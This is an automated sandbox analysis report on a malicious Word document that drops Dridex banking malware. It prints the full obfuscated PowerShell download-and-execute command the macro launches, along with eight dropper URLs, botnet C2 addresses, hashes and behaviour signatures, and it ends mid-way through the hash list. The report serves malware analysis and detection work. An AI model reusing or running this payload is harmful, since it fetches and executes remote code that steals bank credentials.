Analysis

  • max time kernel
    70s
  • max time network
    78s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    08-12-2020 10:38

General

  • Target

    Order.862393485.doc

  • Size

    124KB

  • MD5

    6680b904d6e55ea0969120e71ce09b62

  • SHA1

    924a596b6bb5280bebc08245d89f75c1fe0f319c

  • SHA256

    bfa9bd81b48fbbe69d7525456c074b272634b20c7249f4c562a993c4ffbde0d6

  • SHA512

    c37059bbefa0727571526925f98de3e5f63a961a68d8c43d3c410ac89ce41c42e1af2d4442f9fc36cd2eaa8cee04580a9dc4c823e970df0c8e70eac5551fa5aa

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://mountainceramic.com/kx8vjddb.rar

exe.dropper

http://siemensagent.com/ny2tqv.zip

exe.dropper

https://final.makkahkmcc.com/shqay5y.rar

exe.dropper

https://bhasinbrothers.com/cdy7qodb.rar

exe.dropper

https://test.chongthamsika.com.vn/jl4gs4ar.zip

exe.dropper

https://skvflexandoffset.in/igjkrk3.rar

exe.dropper

http://weedcompare.co.uk/mkcy8uttq.zip

exe.dropper

https://thisismycurrentproject.com/rtftdo.rar

Extracted

Family

dridex

Botnet

10555

C2

104.131.164.93:443

46.101.90.205:4643

27.254.174.84:4443

92.94.251.127:3786

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order.862393485.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:596
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1548
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAEUAVAAtAEkAVABlAG0AIABWAEEAUgBpAEEAQgBMAEUAOgBNADMANgBxADkAIAAgACgAWwB0AFkAUABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsANAB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAIAAnAFQATwBSAFkAJwAsACcAcwBZAFMAdABFACcALAAnAEMAJwAsACcAbQAuAEkAJwAsACcAZQAnACwAJwBPAC4AZABJAFIAJwApACAAIAApACAAIAA7AFMARQBUAC0AVgBhAFIASQBBAEIAbABlACAAKAAiAEQAbQAyACIAKwAiAEkAcgAiACkAIAAoAFsAdABZAHAARQBdACgAIgB7ADUAfQB7ADgAfQB7ADIAfQB7ADYAfQB7ADMAfQB7ADEAfQB7ADcAfQB7ADAAfQB7ADQAfQAiACAALQBGACcATgBUACcALAAnAE8AJwAsACcAZQAnACwAJwBwACcALAAnAE0AQQBOAGEARwBlAFIAJwAsACcAcwBZAFMAVABFACcALAAnAHIAVgBJAGMAZQAnACwAJwBJACcALAAnAG0ALgBuAEUAVAAuAFMAJwApACAAKQAgADsAJABGADIAcgBnADYAXwBtAD0AKAAoACcAVwAnACsAJwA1AGcAaAAwADIAJwApACsAJwBlACcAKQA7ACQAUwBlAG4AbQBoAHIAegA9ACQAUwBrADUAOQA3AHIAMQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgBuADEAaAA1AGYAYwA7ACQATgAzAGQAcQBhAHQAbwA9ACgAJwBKACcAKwAoACcAcQBfAG8AawAnACsAJwB3ACcAKQArACcAOAAnACkAOwAgACgAVgBBAHIAaQBhAEIATABFACAAbQAzADYAUQA5ACAAIAAtAFYAYQBMAHUAZQBvAG4ATABZACkAOgA6ACIAYwBSAEUAYQB0AEUAZABJAGAAUgBFAGAAYwB0AGAAbwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQAnACsAKAAnAFEAMQAnACsAJwA1ACcAKQArACcANwBoAHIANQB7ADAAfQAnACsAKAAnAEIAMAAnACsAJwB3ADQAdAAnACsAJwBjACcAKQArACcAdwB7ADAAJwArACcAfQAnACkALQBGACAAWwBDAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA0AGMAagBpAHoAMQA9ACgAKAAnAEEAJwArACcAYQAwAHMAagAnACkAKwAnAGYAdAAnACkAOwAgACAAKAAgAHYAQQBSAEkAQQBCAGwAZQAgACAAKAAiAGQAbQAyACIAKwAiAGkAcgAiACkAIAAgACkALgBWAGEAbAB1AEUAOgA6ACIAcwBFAGAAQwBVAHIAaQB0AHkAUABgAFIAbwB0AGAATwBjAGAAbwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABUAHUAegBnAHgAegA0AD0AKAAoACcAVwAnACsAJwBnAHUAJwApACsAJwBwAHIAJwArACcAbQBnACcAKQA7ACQAWQBiAGkAMwBmAHEAOQAgAD0AIAAoACcATAAnACsAKAAnAG8AJwArACcAbwBiACcAKwAnAGQANQBvACcAKQArACcANQAnACkAOwAkAEkAcABhAHUANwBwAGkAPQAoACcARwAnACsAJwB4ADEAJwArACgAJwA4ADIAegAnACsAJwBlACcAKQApADsAJABXAG4AYwBmAGsAawB6AD0AKAAoACcASgBjACcAKwAnADYAMgAnACkAKwAnAHMAeQAnACsAJwA5ACcAKQA7ACQASABwAHMAcgB5AHoAbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFEAMQA1ADcAJwArACcAaAAnACsAJwByACcAKwAnADUAewAwACcAKwAnAH0AQgAnACsAKAAnADAAdwAnACsAJwA0AHQAYwAnACkAKwAnAHcAewAwAH0AJwApACAAIAAtAGYAIABbAEMAaABhAFIAXQA5ADIAKQArACQAWQBiAGkAMwBmAHEAOQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQAVwBlAGsAagA0AHgAXwA9ACgAJwBIACcAKwAnAHQAJwArACgAJwBpADEAJwArACcAcgB6ADEAJwApACkAOwAkAEYAZQBrADgAaABiAHUAPQBOAGUAYAB3AC0AbwBCAGAAagBlAGAAQwBUACAAbgBFAHQALgBXAGUAYgBDAGwASQBlAE4AVAA7ACQASAB2AHoAbwBoAGMAMgA9ACgAKAAnAGgAdAAnACsAKAAoACcAdABwAHMAOgBxACcAKwAnAGEAJwArACcAKQAoADYANwApACgAcQBhACcAKwAnACkAJwApACkAKwAoACcAKAAnACsAJwA2ADcAKQAnACkAKwAoACgAJwAoAG0AJwApACkAKwAnAG8AJwArACgAJwB1AG4AJwArACcAdABhAGkAbgBjACcAKQArACgAJwBlAHIAYQBtACcAKwAnAGkAYwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwBxACcAKQArACgAKAAnAGEAKQAnACsAJwAoADYAJwApACkAKwAoACgAJwA3ACkAKABrAHgAJwArACcAOAB2AGoAJwArACcAZABkACcAKwAnAGIALgAnACkAKQArACgAJwByACcAKwAnAGEAcgBAACcAKwAnAGgAdAB0AHAAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAJwArACcAKQAoADYANwAnACkAKQArACgAKAAnACkAJwArACcAKABxAGEAJwApACkAKwAoACgAJwApACgANgA3ACkAKABzACcAKwAnAGkAZQBtAGUAJwArACcAbgBzAGEAJwArACcAZwAnACsAJwBlACcAKwAnAG4AdAAnACkAKQArACgAKAAnAC4AYwBvAG0AcQBhACcAKwAnACkAJwArACcAKAA2ADcAKQAnACkAKQArACgAKAAnACgAbgB5ACcAKwAnADIAdABxAHYALgB6ACcAKwAnAGkAJwArACcAcABAACcAKQApACsAJwBoAHQAJwArACgAKAAnAHQAcABzADoAcQBhACcAKwAnACkAKAAnACsAJwA2ACcAKQApACsAJwA3ACcAKwAoACgAJwApACgAJwApACkAKwAoACgAJwBxACcAKwAnAGEAKQAoADYAJwApACkAKwAoACgAJwA3ACcAKwAnACkAKABmAGkAbgAnACsAJwBhACcAKwAnAGwALgBtACcAKQApACsAKAAnAGEAawAnACsAJwBrAGEAaABrAG0AYwBjAC4AYwAnACsAJwBvACcAKwAnAG0AJwApACsAKAAoACcAcQBhACkAKAAnACsAJwA2ADcAKQAoACcAKwAnAHMAJwApACkAKwAnAGgAcQAnACsAKAAnAGEAJwArACcAeQA1ACcAKwAnAHkAJwArACcALgByAGEAcgBAACcAKQArACgAJwBoACcAKwAnAHQAdABwACcAKwAnAHMAOgAnACkAKwAoACgAJwBxACcAKwAnAGEAKQAnACkAKQArACgAJwAoADYANwAnACsAJwApACgAcQBhACkAJwApACsAKAAoACcAKAA2ACcAKwAnADcAJwApACkAKwAoACgAJwApACgAJwApACkAKwAoACcAYgBoAGEAJwArACcAcwAnACsAJwBpAG4AYgByAG8AdABoACcAKQArACgAJwBlAHIAcwAnACsAJwAuACcAKwAnAGMAbwBtAHEAJwApACsAKAAoACcAYQApACcAKwAnACgAJwArACcANgA3ACkAKABjACcAKQApACsAJwBkAHkAJwArACcANwAnACsAKAAnAHEAbwBkAGIAJwArACcALgByAGEAcgAnACsAJwBAACcAKQArACgAKAAnAGgAdAB0ACcAKwAnAHAAcwA6AHEAJwArACcAYQApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAJwArACcAKQAnACkAKQArACgAKAAnACgAJwArACcAcQBhACkAJwArACcAKAA2ADcAJwApACkAKwAnACkAJwArACgAKAAnACgAdAAnACsAJwBlACcAKQApACsAKAAnAHMAdAAuAGMAaABvAG4AJwArACcAZwB0AGgAJwArACcAYQBtAHMAJwApACsAJwBpACcAKwAoACcAawBhAC4AJwArACcAYwBvACcAKQArACgAKAAnAG0ALgAnACsAJwB2AG4AJwArACcAcQBhACkAKAA2ACcAKwAnADcAKQAoACcAKQApACsAJwBqACcAKwAnAGwAJwArACgAJwA0ACcAKwAnAGcAcwA0AGEAcgAnACsAJwAuAHoAJwApACsAKAAnAGkAcABAACcAKwAnAGgAdAB0ACcAKwAnAHAAJwApACsAJwBzADoAJwArACgAKAAnAHEAYQApACgANgAnACsAJwA3ACcAKwAnACkAKAAnACkAKQArACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAJwAoACcAKwAoACgAJwA2ADcAKQAoAHMAJwArACcAawAnACsAJwB2AGYAbAAnACsAJwBlAHgAYQBuAGQAbwBmAGYAcwBlAHQALgAnACsAJwBpACcAKQApACsAKAAoACcAbgBxACcAKwAnAGEAJwArACcAKQAoACcAKwAnADYANwApACgAaQBnAGoAJwApACkAKwAnAGsAcgAnACsAKAAoACcAawAnACsAJwAzAC4AcgAnACsAJwBhAHIAQABoACcAKwAnAHQAdABwADoAcQAnACsAJwBhACkAKAAnACkAKQArACgAKAAnADYAJwArACcANwApACgAcQBhACkAJwArACcAKAA2ADcAJwArACcAKQAoACcAKwAnAHcAZQAnACkAKQArACgAJwBlAGQAJwArACcAYwBvAG0AJwApACsAJwBwAGEAJwArACgAJwByACcAKwAnAGUALgAnACkAKwAnAGMAbwAnACsAKAAoACcALgB1ACcAKwAnAGsAcQAnACsAJwBhACkAKAA2ADcAKQAoAG0AawAnACsAJwBjAHkAJwApACkAKwAoACcAOAB1AHQAdAAnACsAJwBxAC4AegAnACsAJwBpACcAKQArACgAKAAnAHAAJwArACcAQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBxAGEAKQAnACkAKQArACgAJwAoADYAJwArACcANwApACcAKQArACgAKAAnACgAcQBhACcAKwAnACkAKAA2ADcAJwArACcAKQAoAHQAJwArACcAaABpACcAKwAnAHMAaQAnACsAJwBzAG0AJwApACkAKwAoACcAeQBjAHUAcgByACcAKwAnAGUAJwArACcAbgAnACkAKwAnAHQAJwArACcAcAByACcAKwAoACgAJwBvAGoAZQAnACsAJwBjACcAKwAnAHQALgBjAG8AbQAnACsAJwBxAGEAKQAoACcAKQApACsAKAAoACcANgA3ACkAJwArACcAKAAnACsAJwByAHQAZgB0ACcAKQApACsAKAAnAGQAbwAuAHIAYQAnACsAJwByACcAKQApACkALgAiAHIAZQBgAFAATABhAGMAZQAiACgAKAAoACgAKAAnAHEAYQAnACsAJwApACcAKQApACsAKAAnACgANgAnACsAJwA3ACkAJwApACsAJwAoACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoACcAKwAnAHcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABsAGkAdAAiACgAJABHAGMAaQBxAGwAeQAzACAAKwAgACQAUwBlAG4AbQBoAHIAegAgACsAIAAkAFQAZwBoADUAdQByAHAAKQA7ACQAUwB0AGIAdwBvADcAZwA9ACgAJwBKAGwAJwArACgAJwA2ADMAYwAwACcAKwAnAG0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYANQBxADcAbQBtAGMAIABpAG4AIAAkAEgAdgB6AG8AaABjADIAIAB8ACAAUwBPAGAAUgB0AGAALQBgAE8AQgBqAEUAYABjAHQAIAB7AGcARQB0AC0AYABSAGEAbgBgAEQAYABvAE0AfQApAHsAdAByAHkAewAkAEYAZQBrADgAaABiAHUALgAiAGQAbwBXAGAATgBMAGAATwBBAGQAYABGAEkATABFACIAKAAkAFYANQBxADcAbQBtAGMALAAgACQASABwAHMAcgB5AHoAbQApADsAJABKAGYAcwBxAHAAcgA3AD0AKAAoACcASQAnACsAJwBpAHQAdwBxACcAKQArACcAZgBoACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABIAHAAcwByAHkAegBtACkALgAiAGwARQBOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA2ADQAMAAzACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuAGQAbABsADMAMgAuAGUAeAAnACsAJwBlACcAKQAgACQASABwAHMAcgB5AHoAbQAsADAAOwAkAFEAYQAwAHkAZABsAG8APQAoACgAJwBBACcAKwAnAGMAXwA1ACcAKQArACgAJwBhACcAKwAnAGEAMwAnACkAKQA7AGIAcgBlAGEAawA7ACQATgByAHAAXwBfAGcAaQA9ACgAJwBWACcAKwAoACcAawBmAG0AJwArACcAdQAzAGkAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAeQBwADAAbwBiAGoAPQAoACcAQwB1ACcAKwAoACcAcABvADcAJwArACcAcABtACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:732
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll 0
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:708
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll 0
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Checks whether UAC is enabled
            PID:1316

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      a413b165cbd657e4126a58bd6b682679

      SHA1

      5a368528e181e52f431eb185d36522e9f6bb4d98

      SHA256

      62cfd2cdd48db44396cccb21e1001ce58edfccbb0a9a8cc6730fa5f50ad20f4d

      SHA512

      f2c235d60c2367a8b3470e034741b20f36bab233bfd2994408a84ca5f79478d32bbb6277158477035eb93127839a4985f92783e161923f44ff8f7efe03f91c79

    • \Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      a413b165cbd657e4126a58bd6b682679

      SHA1

      5a368528e181e52f431eb185d36522e9f6bb4d98

      SHA256

      62cfd2cdd48db44396cccb21e1001ce58edfccbb0a9a8cc6730fa5f50ad20f4d

      SHA512

      f2c235d60c2367a8b3470e034741b20f36bab233bfd2994408a84ca5f79478d32bbb6277158477035eb93127839a4985f92783e161923f44ff8f7efe03f91c79

    • \Users\Admin\Q157hr5\B0w4tcw\Loobd5o5.dll
      MD5

      a413b165cbd657e4126a58bd6b682679

      SHA1

      5a368528e181e52f431eb185d36522e9f6bb4d98

      SHA256

